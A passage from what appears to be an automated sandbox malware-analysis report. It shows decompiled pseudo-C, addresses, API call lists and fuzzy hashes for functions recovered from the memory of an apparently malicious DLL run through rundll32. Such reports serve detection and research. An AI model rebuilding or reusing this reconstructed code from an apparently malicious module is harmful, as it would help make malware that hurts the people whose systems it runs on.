                                      • Opcode Fuzzy Hash: eb698f4ce875718c44fef1dd16c5094f6fa85f9b36313e1bd988726078e1a494
                                      • Instruction Fuzzy Hash: D2319031A0021ABFDB11FB97DC94EAE3BBCEB48704F444156A600AB261D771FE459B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4117 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 47%
                                      			E04DE4117(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04DE4DF6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4de9284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                      0x04de411b
                                      0x04de4128
                                      0x04de412a
                                      0x04de412b
                                      0x04de4133
                                      0x04de4133
                                      0x04de4137
                                      0x00000000
                                      0x00000000
                                      0x04de412e
                                      0x04de412f
                                      0x04de4132
                                      0x04de4132
                                      0x04de413f
                                      0x04de4144
                                      0x04de4149
                                      0x04de4151
                                      0x04de4157
                                      0x04de4159
                                      0x04de415c
                                      0x04de4160
                                      0x04de4162
                                      0x04de4165
                                      0x04de4165
                                      0x04de4166
                                      0x04de4168
                                      0x04de4165
                                      0x04de4172
                                      0x04de4175
                                      0x04de4178
                                      0x04de4179
                                      0x04de417b
                                      0x04de4182
                                      0x04de4182
                                      0x04de418e

                                      APIs
                                      • StrChrA.SHLWAPI(?,00000020,00000000,054A95AC,?,?,04DE6940,?,054A95AC), ref: 04DE4133
                                      • StrTrimA.SHLWAPI(?,04DE9284,00000002,?,04DE6940,?,054A95AC), ref: 04DE4151
                                      • StrChrA.SHLWAPI(?,00000020,?,04DE6940,?,054A95AC), ref: 04DE415C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Trim
                                      • String ID:
                                      • API String ID: 3043112668-0
                                      • Opcode ID: 566a2bd2ecd160aaca18f227019b9ec6218cc2d7c77e202bee66efd0acdf6b2d
                                      • Instruction ID: 730dcc8b8c0fb6051343a4d77dd7aa99c8370f666d19b6f597b514acbf0e84a4
                                      • Opcode Fuzzy Hash: 566a2bd2ecd160aaca18f227019b9ec6218cc2d7c77e202bee66efd0acdf6b2d
                                      • Instruction Fuzzy Hash: AF01D4713003666FEB206E2B9C54F777BDDFBE9750F450011B955CB242D671E802C660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3E6C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E04DE3E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E04DE3C00(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x4dea348; // 0x6bd5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x4deb4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x4deb8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E04DE37E9();
					_push( &_v64);
					if( *0x4dea100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E04DE37E9();
				}
				return _t28;
			}















                                      0x04de3e6c
                                      0x04de3e73
                                      0x04de3e7c
                                      0x04de3e81
                                      0x04de3e85
                                      0x04de3e8f
                                      0x04de3e94
                                      0x04de3e99
                                      0x04de3e9e
                                      0x04de3ea8
                                      0x04de3eb2
                                      0x04de3eb2
                                      0x04de3eaa
                                      0x04de3eaa
                                      0x04de3eaa
                                      0x04de3eaa
                                      0x04de3eb8
                                      0x04de3ebe
                                      0x04de3ebf
                                      0x04de3ec2
                                      0x04de3ec5
                                      0x04de3ec8
                                      0x04de3ed0
                                      0x04de3ed9
                                      0x04de3ee1
                                      0x04de3ee1
                                      0x04de3ee3
                                      0x04de3ee5
                                      0x04de3ee5
                                      0x04de3eef

                                      APIs
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(00000000), ref: 04DE3C5A
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(0070006F), ref: 04DE3C6E
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(00000000), ref: 04DE3C80
                                      • memset.NTDLL ref: 04DE3E8F
                                      • GetLastError.KERNEL32 ref: 04DE3EDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocString$ErrorLastmemset
                                      • String ID: <
                                      • API String ID: 3736384471-4251816714
                                      • Opcode ID: 9379dac8a6647fcca6c80159aff59de8bc15ff4c7eb21682d18d3bdb053da8ee
                                      • Instruction ID: 7b5aa20c72c3bfdc4d35fe7dfa53f22b5023b7ea91d5718fd93eec2035697d00
                                      • Opcode Fuzzy Hash: 9379dac8a6647fcca6c80159aff59de8bc15ff4c7eb21682d18d3bdb053da8ee
                                      • Instruction Fuzzy Hash: F801E171A00218ABDB11FF97D884EEE7BB8FB08754F414516ED04AB240D775E9458BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE55D3 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE55D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04DE4DF6(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x4dea378, 0x110);
					_t27 =  *0x4dea37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04DE29B5(0x110, _a4, _a4, _t27, 0);
					}
					if(E04DE66A9( &_v36) != 0) {
						_t35 = E04DE3072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E04DE17E5(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E04DE4C73(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E04DE4C73(_a4);
				}
				return _v16;
			}
















                                      0x04de55d9
                                      0x04de55de
                                      0x04de55eb
                                      0x04de55ee
                                      0x04de55f1
                                      0x04de55f6
                                      0x04de55fb
                                      0x04de5609
                                      0x04de560e
                                      0x04de5613
                                      0x04de5618
                                      0x04de561a
                                      0x04de5623
                                      0x04de5623
                                      0x04de5632
                                      0x04de5647
                                      0x04de564e
                                      0x04de5655
                                      0x04de565b
                                      0x04de5661
                                      0x04de5669
                                      0x04de566f
                                      0x04de5672
                                      0x04de567f
                                      0x04de5684
                                      0x04de5688
                                      0x04de5688
                                      0x04de564e
                                      0x04de5693
                                      0x04de569e
                                      0x04de569e
                                      0x04de56aa

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memcpy.NTDLL(00000000,00000110,?,?,?,?,04DE6D90,?,04DE58B7,04DE58B7,?), ref: 04DE5609
                                      • memset.NTDLL ref: 04DE567F
                                      • memset.NTDLL ref: 04DE5693
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 1529149438-0
                                      • Opcode ID: deba25fcfc895ee22f2f645c131f8da4066a07df42828f941167641fc3aef2e2
                                      • Instruction ID: e7cb1c508b02f78e48097b151841801171e940d58cfe830bc8e2084fbbab5439
                                      • Opcode Fuzzy Hash: deba25fcfc895ee22f2f645c131f8da4066a07df42828f941167641fc3aef2e2
                                      • Instruction Fuzzy Hash: 91215C71A00618BBEF01BFA6DC50FBE7BB8EF09644F004055F904AA250E734EA058BB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE215A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E04DE215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x4dea2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                      0x04de215f
                                      0x04de2164
                                      0x04de2172
                                      0x04de2178
                                      0x04de217c
                                      0x04de21ed
                                      0x04de217e
                                      0x04de2182
                                      0x04de2185
                                      0x04de2188
                                      0x04de218f
                                      0x04de2190
                                      0x04de2191
                                      0x04de2193
                                      0x04de2198
                                      0x04de219f
                                      0x04de21a5
                                      0x04de21a6
                                      0x04de21a6
                                      0x04de21ad
                                      0x04de21ae
                                      0x04de21af
                                      0x04de21b3
                                      0x04de21bf
                                      0x04de21c5
                                      0x04de21c6
                                      0x04de21c6
                                      0x04de21c8
                                      0x04de21ce
                                      0x04de21d0
                                      0x04de21d5
                                      0x04de21d6
                                      0x04de21d6
                                      0x04de21dc
                                      0x04de21e5
                                      0x04de21e7
                                      0x04de21ea
                                      0x04de21f9

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04DE2172
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: FNwPq
                                      • API String ID: 1279760036-3591455833
                                      • Opcode ID: 82e2cdba160c948c02cdd95c55ca81813c4f353f45c89083e86a3c6850ef44ca
                                      • Instruction ID: 4c51392722a850162e696663f088b01c634bb62578c27c96d84bb65c38dfbdff
                                      • Opcode Fuzzy Hash: 82e2cdba160c948c02cdd95c55ca81813c4f353f45c89083e86a3c6850ef44ca
                                      • Instruction Fuzzy Hash: 74110631245345AFEB0A9F2ADC91BE97BA9EF53318F1440CAE5409F392C277960BC720
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4DF6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE4DF6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4dea2d8, 0, _a4); // executed
				return _t2;
			}




                                      0x04de4e02
                                      0x04de4e08

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: FNwPq
                                      • API String ID: 1279760036-3591455833
                                      • Opcode ID: 8661854568f906e7ccc343e7f3c2149f78ea85eae9310fcbdcda3acf524b13ce
                                      • Instruction ID: 34270fee2a5bcb831006bb92e7955060a2c6f14052587d1d2f6e9c847f2e487f
                                      • Opcode Fuzzy Hash: 8661854568f906e7ccc343e7f3c2149f78ea85eae9310fcbdcda3acf524b13ce
                                      • Instruction Fuzzy Hash: 20B01271201200ABCA01AB01DD28F457B21F790700F004410B2045827182770C60FB04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE1162 Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 38%
                                      			E04DE1162(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x4dea348; // 0x6bd5a8
				_t4 = _t49 + 0x4deb450; // 0x54a89f8
				_t82 = 0;
				_t5 = _t49 + 0x4deb440; // 0x9ba05972
				_t51 =  *0x4dea170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x4dea348; // 0x6bd5a8
						_t30 = _t56 + 0x4deb430; // 0x54a89d8
						_t31 = _t56 + 0x4deb460; // 0x4c96be40
						_t58 =  *0x4dea10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x4dea348; // 0x6bd5a8
											_t23 = _t77 + 0x4deb430; // 0x54a89d8
											_t24 = _t77 + 0x4deb460; // 0x4c96be40
											_t106 =  *0x4dea10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x4dea348; // 0x6bd5a8
													_t67 = _v28;
													_t40 = _t100 + 0x4deb420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                                      0x04de116d
                                      0x04de1174
                                      0x04de1175
                                      0x04de1176
                                      0x04de1177
                                      0x04de117d
                                      0x04de1182
                                      0x04de118b
                                      0x04de118e
                                      0x04de1195
                                      0x04de119b
                                      0x04de119f
                                      0x04de11a5
                                      0x04de11ad
                                      0x04de11ae
                                      0x04de11b3
                                      0x04de11b4
                                      0x04de11b6
                                      0x04de11b9
                                      0x04de11ba
                                      0x04de11bb
                                      0x04de11c1
                                      0x04de1257
                                      0x04de125c
                                      0x04de1263
                                      0x04de126d
                                      0x04de1273
                                      0x04de1275
                                      0x04de127b
                                      0x00000000
                                      0x04de11c7
                                      0x04de11c7
                                      0x04de11ce
                                      0x04de11d7
                                      0x04de11db
                                      0x04de11e1
                                      0x04de11e4
                                      0x04de124c
                                      0x00000000
                                      0x04de11e6
                                      0x04de11e6
                                      0x04de127e
                                      0x04de1280
                                      0x00000000
                                      0x00000000
                                      0x04de11ec
                                      0x04de11ec
                                      0x04de11ee
                                      0x04de11f3
                                      0x04de11f7
                                      0x04de11fa
                                      0x04de11ff
                                      0x04de1207
                                      0x04de1208
                                      0x04de1209
                                      0x04de120b
                                      0x04de120f
                                      0x04de1213
                                      0x00000000
                                      0x04de1215
                                      0x04de1219
                                      0x04de121e
                                      0x04de1225
                                      0x04de1235
                                      0x04de1237
                                      0x04de123d
                                      0x04de1242
                                      0x04de1282
                                      0x04de1282
                                      0x04de128f
                                      0x04de1293
                                      0x04de1298
                                      0x04de129e
                                      0x04de12a3
                                      0x04de12ad
                                      0x04de12af
                                      0x04de12b5
                                      0x04de12b5
                                      0x04de12b8
                                      0x04de12be
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de1242
                                      0x00000000
                                      0x04de1244
                                      0x04de1244
                                      0x04de1245
                                      0x00000000
                                      0x04de124a
                                      0x04de11e6
                                      0x04de11e4
                                      0x04de11db
                                      0x04de12c1
                                      0x04de12c1
                                      0x04de12c7
                                      0x04de12c7
                                      0x04de12d0

                                      APIs
                                      • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,?,?,?,?,04DE3C2E), ref: 04DE122F
                                      • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,04DE3C2E,00000000,00000000,00000000,006D0063), ref: 04DE126D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryServiceUnknown_
                                      • String ID:
                                      • API String ID: 2042360610-0
                                      • Opcode ID: d3f64cf32e55ccabd3a4e56a539760fa962bd8f4847cd5ef35a4274229c0e073
                                      • Instruction ID: adcfd7960618feb07b944d92b524e74b48fb8e6c58fed43f32f6303e26e3a231
                                      • Opcode Fuzzy Hash: d3f64cf32e55ccabd3a4e56a539760fa962bd8f4847cd5ef35a4274229c0e073
                                      • Instruction Fuzzy Hash: FE512175A0021AAFCB01EFE5C885DAEB7B9FF88704B048559E905EB311D631AD45CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE69D2 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E04DE69D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04DE1000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4dea348; // 0x6bd5a8
						_t20 = _t68 + 0x4deb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04DE2898(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                      0x04de69d8
                                      0x04de69db
                                      0x04de69eb
                                      0x04de69f4
                                      0x04de69f8
                                      0x04de6ac6
                                      0x04de6acc
                                      0x04de6acc
                                      0x04de6a12
                                      0x04de6a17
                                      0x04de6a1b
                                      0x04de6a21
                                      0x04de6a26
                                      0x04de6a2d
                                      0x04de6a3c
                                      0x04de6a3c
                                      0x04de6a40
                                      0x04de6a42
                                      0x04de6a4e
                                      0x04de6a59
                                      0x04de6a64
                                      0x04de6a68
                                      0x04de6a72
                                      0x04de6a76
                                      0x04de6a78
                                      0x04de6a7d
                                      0x04de6a84
                                      0x04de6a94
                                      0x04de6a94
                                      0x04de6a7d
                                      0x04de6a76
                                      0x04de6a96
                                      0x04de6a9b
                                      0x04de6aa0
                                      0x04de6aa0
                                      0x04de6aa3
                                      0x04de6aac
                                      0x04de6ab1
                                      0x04de6ab1
                                      0x04de6ab6
                                      0x04de6abb
                                      0x04de6abb
                                      0x04de6ab6
                                      0x04de6a40
                                      0x04de6abd
                                      0x04de6ac3
                                      0x00000000

                                      APIs
                                        • Part of subcall function 04DE1000: SysAllocString.OLEAUT32(80000002), ref: 04DE105D
                                        • Part of subcall function 04DE1000: SysFreeString.OLEAUT32(00000000), ref: 04DE10C3
                                      • SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SysFreeString.OLEAUT32(04DE6ECE), ref: 04DE6ABB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: f57f37be8aa06f4382f171267360b1545c65ccf364b5dc9e9194cbc8d65af917
                                      • Instruction ID: 60581999fa94e1134744a6017bdac06e77c0db834a739cb899d38fc863336c39
                                      • Opcode Fuzzy Hash: f57f37be8aa06f4382f171267360b1545c65ccf364b5dc9e9194cbc8d65af917
                                      • Instruction Fuzzy Hash: A5315C71A00119AFCB11EF56C888CAFBBB9FFD97407648658F8159B214E331ED61DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6615 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E04DE6615(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
